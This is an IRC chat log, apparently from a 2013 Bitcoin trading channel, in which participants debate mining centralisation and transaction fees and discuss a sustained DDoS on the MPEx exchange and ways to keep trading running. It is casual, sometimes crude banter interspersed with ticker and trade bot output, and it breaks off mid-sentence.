so we all eat c0x and hence improve. Mar 07 22:13:18 http://pastebin.com/hUcC01nB here's a paste of the vwap page current Mar 07 22:13:18 mjr__ hello Mar 07 22:13:24 its not like it would be unwelcome, gavin has tried to get rid of luke before Mar 07 22:13:25 that is the whole point of the free market, everyone does what they want Mar 07 22:13:28 finding good devs is not easy Mar 07 22:13:30 dub i am not joinint no bs foundation. Mar 07 22:13:35 i am telling the devs what things are Mar 07 22:13:43 if they don't follow i'm going to start my own devteam and fork bitcoin. Mar 07 22:14:07 well do that then but its chosing the harder option Mar 07 22:14:13 i like hard options. Mar 07 22:15:31 and this is not about me either Mar 07 22:15:41 the miners, the larger ones anyway, will be starting their own clients Mar 07 22:15:47 right, so much like we won't have teh market you percieve as free for much longer, bitcoin will stop working Mar 07 22:15:48 maybe not this year, but the next or in 2015 for sure Mar 07 22:15:58 it won't stop working. Mar 07 22:16:06 it will stop caring about people's wishes tho. Mar 07 22:16:12 to the degree that it does now, which is tenuous Mar 07 22:16:21 yes that is the opnly option Mar 07 22:16:34 stop carign about peoples wish for decentralisation and low fees Mar 07 22:16:43 people's wish for low fees they can shove Mar 07 22:16:49 fees will be exactly as high as the market will bear. Mar 07 22:16:57 there's no room for the entitled poor in the new world. Mar 07 22:17:01 its still kinda one of teh selling points Mar 07 22:17:31 and with centralisation you extinguish the last facade of anonynimity Mar 07 22:17:46 so you're gettign back to being a credit card Mar 07 22:18:25 and people thought stalin was hardline. Mar 07 22:18:36 mircea_popescu. more hardline than stalin. just... the other direction. Mar 07 22:18:46 dub anonimity is doing fine. Mar 07 22:19:06 it never existed to begin with. pseudonimity however is just as 100% as it always was. Mar 07 22:19:31 we're not talkign about now Mar 07 22:19:54 forever. Mar 07 22:20:41 in my estimation, asic mining wll be a lot more decentralised than gpu mining Mar 07 22:20:48 which was VERY centralised, but by idiots Mar 07 22:21:06 people like gigavps, amazingrando, hashking et all had a disproportionate share of power in the ecosystem Mar 07 22:21:09 which they went and fucked up. Mar 07 22:21:28 it was based on the shaky foundation of marginal personal ability, cause running a gpu farm is a logistic nightmare. Mar 07 22:21:49 it did use the cheap "anyone can run a gpu" fud tactic, but in fact it was as centralised as it can get. Mar 07 22:22:00 anyone can run an asic. so... que the end of that system. Mar 07 22:22:12 its NO different Mar 07 22:22:22 it's different in some ways at least. Mar 07 22:22:46 not once teh generational change has completed Mar 07 22:23:01 it will be a case of "he who has 1000 bucks gets a vote" Mar 07 22:23:20 instead of "he who has 200 dollars and spends his time f5-ing amazon and knows how to make fire hazard pics in his basement" Mar 07 22:23:35 i much prefer the former. it's cleaner. Mar 07 22:23:58 im not following Mar 07 22:24:10 well... where ? Mar 07 22:24:17 you think mining will be more distributed with higher cost to play? Mar 07 22:24:26 or more solo miners? Mar 07 22:24:39 there will be a SMALLER cost to play. Mar 07 22:24:47 it will however be cash upfront. Mar 07 22:24:53 mining has been centralised since pools appeared Mar 07 22:24:56 before the cost to play was, 200 bucks + 5k worth of computer competence. Mar 07 22:25:01 now it's 1k bucks and a power outlet. Mar 07 22:25:12 overall cost went down by 80% Mar 07 22:25:21 it's just some people don't know how to account, and so the 5k "is free" Mar 07 22:25:59 but let me put it this other way : Mar 07 22:26:08 there are at least 100mn people in this world who can spend 1k dollars. Mar 07 22:26:24 there are MAYBE 1mn people in this world who have the skills to run gpu rigs but do not have gainful employment Mar 07 22:26:32 asics are plug and play - gpus required a considerable amount of experise and se to manage Mar 07 22:26:36 unsuirprisingly, they;'re mostly mental deffecrtive / weird / marginal doods. Mar 07 22:26:48 bullshit Mar 07 22:26:52 so our miner putative market increased by a factor of 10k% Mar 07 22:27:12 dub hey, it may well be bullshit Mar 07 22:27:19 but it's what i think on the matter. Mar 07 22:28:29 I think we can all agree that the continued eating of c0x by all users/miners/devs will improve bitcoin or it's bastard children. Mar 07 22:28:38 it sounds like youa re arguing that like gamers mining on their 1-2 gpus, a lot of randoms will decide to grab an asic and mine Mar 07 22:28:40 http://bitcoinity.org/markets Mar 07 22:28:40 *its Mar 07 22:28:45 do these graphs look right to anyone ?! Mar 07 22:28:57 dub no. Mar 07 22:29:15 reality is asic mining will centralise much more than gpu mining did Mar 07 22:29:24 i am arguing that for every wanna-break the world kid / bank clerk who thinks he's a banker / duimbass kid who thinks writing "options" on a webpage makes him an options trader Mar 07 22:29:32 that get pushed our mercilessly Mar 07 22:29:32 bitcoinity workd Mar 07 22:29:37 *works here Mar 07 22:29:37 there will be 10 to 100 actual sane people Mar 07 22:29:46 as soon as diff normalises its the same game Mar 07 22:30:07 dub no because the cost to be the top dog will have went from own 500 items worth 200 each Mar 07 22:30:09 either eek out a tiny margin on your gaming rig/hobby asic or go large Mar 07 22:30:13 to own 50`000 items worth 1k each Mar 07 22:30:22 so from 100k to 50mn Mar 07 22:30:32 jurov it does work, but the graph looks like wtf. Mar 07 22:30:34 instead of "he who has 200 dollars and spends his time f5-ing amazon and knows how to make fire hazard pics in his basement yes the debpth (bottom graph) is wtf in firefox. but in konqueror+webkit it's fine Mar 07 22:32:00 and if you think people won't be buying asics at 1k a pop, let me tell you something : Mar 07 22:32:17 when that hungarian scammer showed up it he was checked out the next day Mar 07 22:32:19 by independent teams. Mar 07 22:32:46 there is demand. come out with an inventory of asics you will sell 10-100k units in a month if you can actuyally deliver them. Mar 07 22:32:49 ;;burnside Mar 07 22:32:50 Error: "burnside" is not a valid command. Mar 07 22:32:57 ;;seen burnside Mar 07 22:32:57 burnside was last seen in #bitcoin-assets 1 day, 22 hours, and 30 seconds ago: I don't think so. Mar 07 22:33:16 mircea_popescu: exactly the same thing will happen as happened with gpu Mar 07 22:34:21 i have been given a free scam lightning miner 4.0 unit Mar 07 22:34:22 people that know what to do with them made money? Mar 07 22:34:27 when people get sick of the heat, noise and earning $2/week they will get out Mar 07 22:35:02 which will leave people who are doign ot as a business Mar 07 22:35:32 funny, 100mhash revenue in euro dollars is same as 1 year ago give or take Mar 07 22:35:33 http://smpake.com/etc/btc/charts.php Mar 07 22:36:05 sure for 10 minutes Mar 07 22:36:26 what a captivating update... https://bitcointalk.org/index.php?topic=99497.msg1597133#msg1597133 Mar 07 22:36:45 https://bitcointalk.org/index.php?topic=99497.msg1597133#msg1597133 Mar 07 22:36:52 sry Mar 07 22:39:02 when that hungarian scammer showed up it he was checked out the next day Mar 07 22:39:07 ThickAsThieves does that say anything ?! Mar 07 22:39:14 i've been debating whether or not to run more gpu/more fpga every day Mar 07 22:39:14 i cant tell Mar 07 22:39:15 I don't need to tell you that the only people who checked it out are serious miners Mar 07 22:39:27 i'd really like to acquire 3x singles Mar 07 22:39:28 you do need to tell me that so i can lol. Mar 07 22:39:38 i had it checked out dood. im no miner at all. Mar 07 22:40:00 a few extra mindless forum babies does not a decentralised verification network make Mar 07 22:40:27 think about it : i am going to get a mining cluster which i will run for purely strategic reasons Mar 07 22:40:37 mpex needs assurance that idiots like luke-jr stay irrelevant. Mar 07 22:40:50 so will pretty much every single service built on top of bitcoin Mar 07 22:40:55 stop being trite Mar 07 22:40:55 then add the pro miners Mar 07 22:41:03 [HAVELOCK] [HIM] 5 @ 1.45 = 7.25 BTC [+] Mar 07 22:41:04 then add all the people who want to run a 1k unit Mar 07 22:41:06 if you got into mining you it would not be with one asic Mar 07 22:41:29 dub i can calculate how many asics i need to have in order to guarantee my payments make it witin an arbitrary timeframe Mar 07 22:41:33 this is basic provisioning. Mar 07 22:41:46 yes which is beyond 90% of would be miners Mar 07 22:41:50 so ? Mar 07 22:41:59 strategic mining is a subject i like Mar 07 22:42:21 jcpham i bet you in 2013 we will have special mining software allowing miner to issue orders much like ip routing tables Mar 07 22:42:22 what is even being argued here? Mar 07 22:42:28 "always include my txs, irrespective of fee" Mar 07 22:42:29 whether there will be more and more prosumer miners? Mar 07 22:42:33 hrm Mar 07 22:42:54 "always include txs to these addies, if fee is x" Mar 07 22:42:55 etc. Mar 07 22:43:08 there will be a dedicated box preparing the mempool for mine rigs in most farms Mar 07 22:43:24 so every bitcoin merchant has a mining farm to confirm its txn Mar 07 22:43:30 dub yep. Mar 07 22:43:34 hell, why not an altchain each Mar 07 22:43:35 jeebus Mar 07 22:43:44 i'm getting hella paid leasing my rigs then Mar 07 22:43:52 dub if bitcoin fucks up you bet your sweet life an altchain each. Mar 07 22:44:01 mining cooperatives are an excellent idea Mar 07 22:44:02 the girl hinted as much at some point arguing with the hearn&co idiot parade. Mar 07 22:44:18 jcpham a revenue stream will be table leasing Mar 07 22:44:19 even though everyone hates on it Mar 07 22:44:26 people will pay you to include their rules. Mar 07 22:44:42 soon enough there will be a market for mempool gatway rules. Mar 07 22:44:55 talk about driving innovation. Mar 07 22:45:01 yep Mar 07 22:45:23 yeah, you just invented fiat Mar 07 22:46:39 suddenly yet another reason for 1Fx3N5iFPDQxUKhhmDJqCMmi3U8Y7gSncx emerges. Mar 07 22:46:49 it will be a LOT easier to handle those issues with fixed addies Mar 07 22:46:55 sdice has an advantage too. Mar 07 22:47:26 you realise that your anonymity model is bunk when you only connect to nodes you transact with Mar 07 22:48:23 So this got Hearn's panties in a bunch even though he does so much work with SPV clients? Mar 07 22:49:15 mircea, how can i get quotes right now? Mar 07 22:50:38 mjr__ right now you can't. what are you trying to do ? Mar 07 22:50:48 dub i am not interested in being anon. Mar 07 22:51:02 obviously other people will implement other models. Mar 07 23:03:03 [HAVELOCK] [HIM] 20 @ 1.45 = 29 BTC [+] Mar 07 23:04:11 BingoBongo i dunno what his problem was. Mar 07 23:04:39 [BTCTC] [BTC-BOND] 1 @ 0.00999 BTC [+] Mar 07 23:04:46 Too soft for the interwebz maybe? Mar 07 23:05:04 maybe. Mar 07 23:06:02 [HAVELOCK] [HIM] 2 @ 1.45 = 2.9 BTC [+] Mar 07 23:07:05 I could see getting pissed about colored coins or the dude who put and MP3 on testnet trying that on the real blockchain, but miners filtering transactions? Gavin reccommends conf settings for miners. Mar 07 23:09:11 BingoBongo o, no, no. the argument was about hm Mar 07 23:09:14 da fuck was it about Mar 07 23:09:21 o yes, i think he wanted increased block size. Mar 07 23:10:01 and honestly i think colored coins are a horrible nonstarter. i can only imagine the sort of crap that'd occur if they caught on Mar 07 23:10:03 [HAVELOCK] [HIM] 6 @ 1.45 = 8.7 BTC [+] Mar 07 23:10:12 and there'd be satoshi's running around everywhere Mar 07 23:10:28 mircea: just wanted to see where my positions were at Mar 07 23:10:33 no big deal Mar 07 23:10:49 mjr__ trade is practgically frozen so nothing much would have changed. Mar 07 23:10:54 cool Mar 07 23:11:11 that;s kinda it, i could have come up with a pure vpn solution Mar 07 23:11:20 and only allow trusted people on the network to talk to the exchange Mar 07 23:11:27 (which incidentally is how things work irl ) Mar 07 23:11:41 however, i judged that'd create a haves/havesnot disparity that's both huge and sudden Mar 07 23:11:53 better and fairer just freeze things for a little bit. Mar 07 23:14:12 i agree Mar 07 23:15:15 i like the protected message open channel Mar 07 23:15:21 but to expand on the plan : as an absolute rock bottom if things can't be otherwise resolved within a week, i will publish a gmail address, and trade will work via email (you email your paste instead of putting into site, you get it back) Mar 07 23:15:55 out of curiosity and i haven't really thought this all the way through Mar 07 23:15:56 as a relative rock bottom, if things can't be otherwise resolved within a couple of days i will have a vpn installed. this has the disadvantage that it puts the brokers in an iffy spot Mar 07 23:16:03 [HAVELOCK] [HIM] 2 @ 1.55 = 3.1 BTC [+] Mar 07 23:16:20 also, we are currently working on using irc bot much like gribble works. there should be one up soon and another during weekend. Mar 07 23:16:32 would a recaptcha and session timeout not solve most of it? Mar 07 23:16:38 and also, much larger infrastructure should be coming online during the 8th. Mar 07 23:16:43 mjr__ nope. Mar 07 23:16:55 it would solve nothing at all. routers are getting friend, not boxes. Mar 07 23:17:00 oh ok Mar 07 23:17:03 true Mar 07 23:17:32 and i'm sure that they are randomizing the addresses enough to bypass any sort of blacklist rirght? Mar 07 23:17:50 and CDN couldn't fix either? Mar 07 23:18:10 cdn doesn't do this. there are ddos protection services out there, but all have their own issues Mar 07 23:18:14 i'm sure you have thought this through Mar 07 23:18:14 it's a long story. Mar 07 23:18:19 yeah Mar 07 23:18:25 i was just curious for my own benefit Mar 07 23:18:29 as to how one combats this Mar 07 23:18:31 well, for your own benefit : Mar 07 23:18:40 i'm really fine regardless Mar 07 23:18:45 cloudflare is very cheap (like200 a month) but it's mostly intended for random kid dickery. Mar 07 23:18:47 buy and hold Mar 07 23:18:57 this is not what we're dealing with here. Mar 07 23:19:02 yeah lol; Mar 07 23:19:05 this is quite sustained Mar 07 23:19:15 Cloudflare goes down enough on its own Mar 07 23:19:23 blacklotus is expensive, and i have yet to locate anyone that can give me the straight dope about what they actually do./ Mar 07 23:19:46 incapsula is sorta like more of a midmarket thing Mar 07 23:20:00 hmmm, and since it is routers not boxes, proxies won't really help? Mar 07 23:20:26 mjr__ proxies help in the exact sort of way i had it set-up : open web proxy which connects on a sort of private vpn to mpex webservers Mar 07 23:20:35 but the thing is, they actually took the time to blow up all these. Mar 07 23:20:42 hmmm, i have a little idea Mar 07 23:20:51 but it is rough Mar 07 23:21:10 and would depend on what router capabilities Mar 07 23:21:20 and whether you have control/access to it Mar 07 23:21:25 hm ? Mar 07 23:21:31 ;;ticker Mar 07 23:21:31 BTCUSD ticker | Best bid: 42.72301, Best ask: 42.84000, Bid-ask spread: 0.11699, Last trade: 42.72301, 24 hour volume: 162226.99314014, 24 hour low: 33.30000, 24 hour high: 46.74900, 24 hour vwap: 41.19641 Mar 07 23:21:40 !ticker m ^OIX Mar 07 23:21:53 mircea_popescu: what is the OIX Mar 07 23:22:02 It says some pelt-wearin' trapper, some stinkin' bean-suckin' possum skinner, he's gonna collect that reward money. Mar 07 23:22:05 i'm wondering if you could basically require a signed message in the http header request to get to the webserver Mar 07 23:22:20 mjr__ the ddos is not actually containing headers. Mar 07 23:22:23 ie. the router would drop all traffic that did not contain the signed header Mar 07 23:22:28 damn UTP shit? Mar 07 23:22:33 UDP Mar 07 23:22:35 a complete mess and mix. Mar 07 23:22:36 typo lol Mar 07 23:22:46 thestringpuller it's the options sentiment index. Mar 07 23:26:19 mircea_popescu: I meant what is it currently atm Mar 07 23:26:25 SINCE YOU HAVEN'T FIXED MPEX Mar 07 23:26:29 stop making people angry at you Mar 07 23:26:41 lemme see Mar 07 23:27:01 my sentiment is that the options aren't there right now Mar 07 23:27:06 hmm couldn't you conceivably use QoS to give http traffic priority on the router Mar 07 23:27:24 not if the router is on fire Mar 07 23:27:30 {"avg": "4713745617","min": "3024713516","max": "4853472885","vsh": "no","vsa": "2.62504497419E+12","cnt": ""} Mar 07 23:27:57 mjr__ understand, the box was doing something like 0.07 load all through the ddos. Mar 07 23:28:00 it's not the server at all. Mar 07 23:28:21 damn Mar 07 23:28:28 option index is still bullish on the current price Mar 07 23:28:42 well yeah, because Mar 07 23:28:50 a. a lot of calls closed up past 24 hours. those don't count. Mar 07 23:29:02 b. a lot of longass short puts were closed, which does count Mar 07 23:29:20 but it counts from way up, so it makes the put side kinda high too Mar 07 23:29:25 yowch Mar 07 23:29:39 I hope MPOE-bot is holding it together... Mar 07 23:29:45 i mean put side is up to 30, from like 22 earlier Mar 07 23:29:53 mpoe bot is like... wtf did everyone go ? Mar 07 23:29:57 getting depressed and loneyl. Mar 07 23:30:59 Mircea, maybe you should tweet @binarybits about this interesting bitcoin story he could run on Ars... Any publicity is good publicity... Mar 07 23:31:48 im not sure 'we had to close doors due to ddos' is great publicity Mar 07 23:32:07 lol Mar 07 23:32:21 anything can be turned into great publicity. Mar 07 23:32:30 and singing of imminent mitigation may be premature Mar 07 23:32:32 your wife's a whore ? well... at least she's hawt. Mar 07 23:32:46 Gox is alive after all of those Haxxed stories Mar 07 23:33:01 i think there's enough presence to keep the stakeholders appraised. Mar 07 23:33:02 gox is alive because nobody has mannned up to replace it Mar 07 23:33:06 send a cryptic email explaining how the hot wallet backup was unencrypted and accesible via telnet Mar 07 23:33:08 other than that... heh. Mar 07 23:33:08 nobody is a willing user of gox Mar 07 23:34:18 jcpham i think someone might have noticed that mpex didn't answer on 23 Mar 07 23:34:23 or wait, was 23 ftp ? Mar 07 23:34:45 jokes Mar 07 23:34:45 no, telnet iirc Mar 07 23:35:06 you should make aup along crytpic convoluted story Mar 07 23:35:15 rackspace? Mar 07 23:35:18 involving backups and password in source codes Mar 07 23:35:23 secret agents Mar 07 23:35:24 and vampires Mar 07 23:35:29 mos def vampires Mar 07 23:36:03 make the story long enough and people will stop caring about halfway through reading Mar 07 23:36:09 maybe mpoe-pr could be a vamp Mar 07 23:36:09 ire Mar 07 23:36:09 they'll just figure it's another scam Mar 07 23:36:35 you could use nntp tbh Mar 07 23:36:36 then add the word "Psyche" at the end. Mar 07 23:36:59 http://live.coinbr.com/ THE SHOW MUST GO ON Mar 07 23:37:04 dub i was more considering that guy's bitmessage p2p thing Mar 07 23:37:16 google groups can probably take teh dos Mar 07 23:40:50 heh, I've been ddos'd ~700 times in teh last month Mar 07 23:41:23 acording to arbor anyway, I don't recall noticing any of them Mar 07 23:42:00 ya well, they gotta sell themselves somehow. Mar 07 23:42:12 that's kind of the problem, very chinese market out there. "yes sir i tell you we do ddosprotection" Mar 07 23:42:13 yep Mar 07 23:42:28 "o wait, you mean ddos as in, 6-7 gb sustained with 20gb peaks ?! OMG TAKE A HIKE" Mar 07 23:42:32 its a racket for sure Mar 07 23:45:17 http://www.mail-archive.com/cryptography@metzdowd.com/msg09964.html Mar 07 23:47:28 Visa processed 37 billion Mar 07 23:47:28 transactions in FY2008 Mar 07 23:47:32 afaik that number is off Mar 07 23:47:38 more like 3.7 Mar 07 23:48:58 well at least satoshi was considering very big block sizes Mar 07 23:49:26 and specialized mining hardware Mar 07 23:49:44 If a small number of entities are issuing new coins, Mar 07 23:49:44 this is more resistant to state attack that with a Mar 07 23:49:44 single issuer, but the government regularly attacks Mar 07 23:49:44 financial networks, with the financial collapse ensuing Mar 07 23:49:44 from the most recent attack still under way as I write Mar 07 23:49:44 this. Mar 07 23:49:44 Government sponsored enterprises enter the business, in Mar 07 23:49:44 due course bad behavior is made mandatory, and the evil Mar 07 23:49:44 financial network is bigger than the honest financial Mar 07 23:49:44 network, with the result that even though everyone knows Mar 07 23:49:44 what is happening, people continue to use the paper Mar 07 23:49:44 issued by the evil financial network, because of network Mar 07 23:49:44 effects - the big, main issuers, are the issuers you use Mar 07 23:49:44 if you want to do business. Mar 07 23:49:46 that guy is smart. Mar 07 23:51:25 ;;calc 3700000000/365 Mar 07 23:51:25 10136986.3014 Mar 07 23:52:14 [BTCTC] [ASICMINER-PT] 1 @ 0.65 BTC [-] Mar 07 23:52:36 so ~10 million Mar 07 23:53:09 mod6, side bar Mar 07 23:53:13 http://blockchain.info/charts/n-transactions-total << says we're between 12-14m per day Mar 07 23:54:03 *not per day Mar 07 23:54:06 *per ever Mar 07 23:54:45 mod6, you're looking for this? http://blockchain.info/charts/n-transactions Mar 07 23:55:12 oh my bad Mar 07 23:55:42 we're like Visa transactions in Kansas City Mar 07 23:55:58 that seems much more realistic. Mar 07 23:56:04 i should have examined that closer Mar 07 23:56:05 Mp, what about using bitcoin to send the trade message to your address. cant ddos the entire network, put the encypted message inside a signed transactions- use it just like SD does Mar 07 23:56:31 jborkl " cant ddos the entire network" << o but they can. Mar 07 23:56:46 well, it would be much harder Mar 07 23:57:01 it would be painful, especially if they go after nodes one at a time Mar 07 23:57:09 yeah, tell that to dalnet Mar 07 23:57:27 yes, if they tracked your first relay and knocked it off, then next one Mar 07 23:57:54 but you can change your relay in bitcoind easily Mar 07 23:57:56 but I support this move, if only to see the rage from Luke-Jr Mar 07 23:58:38 and you could build trusted relay nodes to push transactions Mar 07 23:58:45 dub i could start with his relays lol Mar 07 23:58:58 lol, that would piss him off so bad Mar 07 23:59:00 jborkl what i'd do is cause a lot of grief to people otherwise ill equipped to cope. Mar 07 23:59:03 it would be worth it Mar 07 23:59:18 ok, fair enough Mar 07 23:59:30 im not here to cause trouble, contrary to what you might have heard. Mar 07 23:59:36 i'll be bringing more capacity online and that's that. Mar 07 23:59:42 I don't think you are Mar 07 23:59:50 was just being facetious hehe Mar 08 00:01:55 I heard PrimeAsic, that 99% chance of scam is responsive to inquiries again... Mar 08 00:02:39 If you were a asshole scammer, you would probably run off with Nefario, Piratits, and the list goes on. I am not concerned if you are a asshole, that is not my problem Mar 08 00:03:01 :) Mar 08 00:03:43 people seem to get confused, you are one of the only ones that has not run away, yet they accuse you all the time Mar 08 00:04:03 [HAVELOCK] [SDICE] 1 @ 0.45 BTC [-] Mar 08 00:04:05 [HAVELOCK] [SDICE] 1 @ 0.43500001 BTC [-] Mar 08 00:04:13 BingoBongo i kinda stopped following Mar 08 00:04:24 i mean... this is vegas. you get a chance. Mar 08 00:04:50 jborkl sometimes people say the things they most fear. it's a defense mechanism. Mar 08 00:05:21 [BTCTC] [ASICMINER-PT] 20 @ 0.65 = 13 BTC [-] Mar 08 00:09:04 [HAVELOCK] [SDICE] 1 @ 0.43500001 BTC [-] Mar 08 00:09:10 !ticker m S.DICE Mar 08 00:09:14 dude seriously Mar 08 00:09:23 MIRCEA FIX THIS Mar 08 00:09:32 Quest for vision is a great blessing. Mar 08 00:09:47 This is what you get for making people mad. Mar 08 00:10:09 fix what? Mar 08 00:10:39 http://i.imgur.com/A9ir3GI.gif this is possibly the most useful gif ever Mar 08 00:12:20 dub you rule sometimes Mar 08 00:12:23 just wow Mar 08 00:13:21 I can't take credit its from the forum Mar 08 00:14:24 Eh, I figured PrimeAsic blew their chance earlier this week. I'm having trouble figuring out if they are a well planned scam, troll, or both. Mar 08 00:17:04 [BTCTC] [BASIC-MINING] 1 @ 0.345 BTC [+] Mar 08 00:19:16 Is mpex.co down? Mar 08 00:19:31 Err... /topic. Sorry. :) Mar 08 00:19:57 Eduard_Munteanu you've missed out on an entire saga. Mar 08 00:20:21 [MPEX] [S.DICE] 10000 @ 1000 BTC [+] Mar 08 00:20:46 bitvps gets 2nd round Mar 08 00:21:30 poor jcpham Mar 08 00:21:31 jurov what's that mean ? Mar 08 00:21:36 jborkl lol you gave me a start. Mar 08 00:21:44 Nothing important, I just wanted to peek at the options prices. Placing my overnight orders on mtgox... Mar 08 00:21:45 Lol Mar 08 00:21:59 Eduard_Munteanu mostly the open interest covered yest. Mar 08 00:22:11 I should have /nick but I didnt want people to really have a heart attack Mar 08 00:22:19 bitcoinity dead again ? ;/ Mar 08 00:22:21 we were making my vps accessible under another addy, suddenly mgmt froze again Mar 08 00:22:28 lol Mar 08 00:22:34 bitcoincharts.com is dead as well. :( Mar 08 00:23:10 oix : "7d": {"avg": "4713745617","min": "3024713516","max": "4853472885","vsh": "no","vsa": "2.62504497419E+12","cnt": ""} Mar 08 00:23:14 it works here Mar 08 00:23:16 it's relatively stale tho. Mar 08 00:23:31 jurov: can you see any chart here? http://bitcoincharts.com/charts/ Mar 08 00:23:57 yes, dispalyes quickly Mar 08 00:23:57 Only the top ribbon on that page loads. Mar 08 00:24:02 Hm. Mar 08 00:24:04 i cant see it either Mar 08 00:24:34 Some #mtgox op told me they've banned most of my provider (RDS). Mar 08 00:24:44 heh Mar 08 00:24:55 I should probably switch to IPv6 or get a static address. Mar 08 00:25:20 The former sounds like a better idea. Mar 08 00:25:24 i think more than just mpex, tis a test for bitcoins in general. Mar 08 00:25:34 Yeah. Mar 08 00:25:44 pretty much every service is getting hit someway Mar 08 00:25:51 the network itself was struggling with txs yest Mar 08 00:26:04 growth pains. Mar 08 00:26:24 blockchain.info is down Mar 08 00:26:38 Also, all those chart / live data services merely do client-side lookups through the mtgox API, it seems. Instead of caching and relaying data. Mar 08 00:26:46 [BTCTC] [COGNITIVE] 1 @ 0.24999 BTC [+] Mar 08 00:26:48 [BTCTC] [COGNITIVE] 2 @ 0.24999 = 0.5 BTC [+] Mar 08 00:27:19 I guess mtgox is suddenly getting DDoSed by that, not to mention the actual transactions. Mar 08 00:27:36 blockchain up here Mar 08 00:28:20 Oh, well, I've placed my orders for the night, pretty conservative. Mar 08 00:28:28 live data would not cache by the definition of the term Mar 08 00:28:42 [BTCTC] [BASIC-MINING] 1 @ 0.345 BTC [+] Mar 08 00:32:56 ;;tslb Mar 08 00:32:59 Time since last block: 36 minutes and 4 seconds Mar 08 00:33:41 prime asic broke ze chain Mar 08 00:38:56 dude again over half hour ?! Mar 08 00:38:59 this is atrocious. Mar 08 00:39:12 yest i had txs lay stale for > 6 hours before being included in a block. Mar 08 00:39:12 smpake would be useful. Mar 08 00:39:19 Pools getting attacked? Mar 08 00:39:21 and im not exactly talking 10 bitcoins here Mar 08 00:39:35 it was 11. Mar 08 00:39:39 people were liek "o, your bitcoind is ddosed too ?" and i was like no dude, the tx is out since noon '/ Mar 08 00:40:48 yeah Mar 08 00:40:54 paypal looks nice again Mar 08 00:41:08 totally. Mar 08 00:41:51 same question as BingoBongo: are pools being ddosed as well? Mar 08 00:42:32 http://i.imgur.com/A9ir3GI.gif http://i.imgur.com/A9ir3GI.gif http://i.imgur.com/A9ir3GI.gif http://i.imgur.com/A9ir3GI.gif Mar 08 00:43:00 so, phungus from bitvps blames me and he won't enable my vps access anymore Mar 08 00:43:14 lol Mar 08 00:43:15 best time to withdraw everything and leave Mar 08 00:43:22 mircea_popescu , will you let me? Mar 08 00:43:28 let you what ? Mar 08 00:43:36 coinbr is down? Mar 08 00:43:43 sell&withdraw everything from coinbr acct Mar 08 00:43:57 and blame bitvps Mar 08 00:44:00 yes, but you have to consider if you sell right now you're hurting customers. Mar 08 00:44:14 not sure what consolation blaming bitvps will be. Mar 08 00:44:51 you didn't understand me.. i can now vanish with all customers funds Mar 08 00:44:54 anyway, par for the course for "hosting" out there : sure we can do it sir! o you mean things actually need to be done ? sorry, pls go to somewhere else. Mar 08 00:45:02 as so many ppl did Mar 08 00:45:03 if you ask them they're hosting corps, offer things like unlimited bw. Mar 08 00:45:18 tghen if you serve 500 pages in a day it's suddenly... we're only hosters if you don't get traffic. Mar 08 00:46:04 and if you attract ddos, you must apologize. Mar 08 00:46:47 anyway, their upstream/colo host prolly told them to not do it again or else get a real connection Mar 08 00:47:45 but yeah, I do have recent enough coinbr backups and am not running away. Mar 08 00:47:53 good. Mar 08 00:47:56 dunno if i should make me killer coffee and set it up or it can wait till tomorrow Mar 08 00:48:07 i think it can wait till tomorrow. Mar 08 00:48:08 mircea_popescu, how it looks on your side? Mar 08 00:48:27 should be getting everything online today technically since it's almost 1am Mar 08 00:48:41 but maybe get an account with a good ddos protected host. Mar 08 00:48:53 because i tell you something, when they won't be able to take me down they'll harass you Mar 08 00:49:05 and you have a much larger userbase crossection, you'll read plenty of shit in the forum Mar 08 00:50:18 i know... hope i bought some time with amazon, plan to set up some load balancing there quickly Mar 08 00:51:30 prolly your best path of action on a personal level is Mar 08 00:51:34 get some sleep now Mar 08 00:51:38 wake naturally Mar 08 00:51:40 deal with it then Mar 08 00:51:56 heh okay.. if i manage to get asleep Mar 08 00:53:17 !ticker m s.mpoe Mar 08 00:53:38 Aren't those tins of tobacco right there behind you? Mar 08 00:53:57 Mp or Jurov - are there a bunch of pending market orders to fill? Mar 08 00:54:24 no, they are filled normally - see live.coinbr.com Mar 08 00:54:56 jborkl nope. Mar 08 00:55:08 good Mar 08 00:55:32 today is mpex sunday :D Mar 08 00:56:23 all of the coinbr are down for me and have been Mar 08 00:57:29 jborkl, prolly stale DNS entries Mar 08 00:58:18 same problem here, my isp insists caching them, had to change dns server Mar 08 00:59:05 page hangs for me atm Mar 08 00:59:09 but it does find your domain/favicon Mar 08 00:59:56 http://coinbr.com should work at least, https is not set up yet so it fails Mar 08 01:00:24 and mpex. and live. did not have dns expiration so they linger up pointing to bitvps Mar 08 01:01:45 ah i c Mar 08 01:05:15 224744 2 minutes 443 25.33651677 BTC Deepbit 249kb; 224743 4 minutes 581 25.48650003 BTC 199.101.100.218 243kb Mar 08 01:05:30 Interesting last couple blocks Mar 08 01:06:05 Barely more than the block reward in transactions and nearly a quarter megabyte each Mar 08 01:06:50 indeed Mar 08 01:12:34 And these big barely more than 25 BTC blocks continue... Mar 08 01:13:30 ;;tslb Mar 08 01:13:39 Time since last block: 4 minutes and 12 seconds Mar 08 01:19:36 mircea_popescu: how goes the botting? :) Mar 08 01:19:51 smickles: lol you asshole Mar 08 01:19:53 slowly it seems Mar 08 01:21:02 Hey, anyone seen Namworld around? Mar 08 01:21:45 mircea_popescu: heh ic Mar 08 01:21:56 BitHub he just joined Mar 08 01:22:13 lulz Mar 08 01:22:25 ahh man i really shouldn't use this thing when i first wake up Mar 08 01:22:43 thanks mircea, how are you by the way? Mar 08 01:24:08 I'm here now. What do you need? Mar 08 01:24:21 i'll pm you Mar 08 01:24:23 brb first tho Mar 08 01:28:03 i'm great. Mar 08 01:31:22 Did you get any demand for fees to stop the DDoS yet?? Mar 08 01:31:40 Or is the DDoS done out of spite or something Mar 08 01:32:21 I need to go in and make a deposit/trade Mar 08 01:32:50 Can you take manual deposits for now? Mar 08 01:33:03 heh what ddos? Mar 08 01:33:14 MPEx getting ddos'ed Mar 08 01:33:36 lame Mar 08 01:34:05 meanwhile btcjam goes on Mar 08 01:35:17 No one cares about BTCjam... that's why Mar 08 01:35:44 haha Mar 08 01:37:09 test Mar 08 01:39:36 nice topic Mar 08 01:39:57 anybody else listen to Takenobu? Mar 08 01:40:09 [BTCTC] [GSDPT] 20 @ 0.005979 = 0.1196 BTC [-] Mar 08 01:40:14 asian violinist. Mar 08 01:40:34 he killed my weasel with music. Mar 08 01:41:32 namworld yeah, ddos Mar 08 01:42:07 6 blocks mined in 17 minutes?! Mar 08 01:42:12 sillything to Do to Mar 08 01:42:14 Namworld no demands. Mar 08 01:42:17 its like faaaasst, then sloooow Mar 08 01:42:45 mod6 weirdhuh Mar 08 01:42:51 mod6 I've heard that randomness is 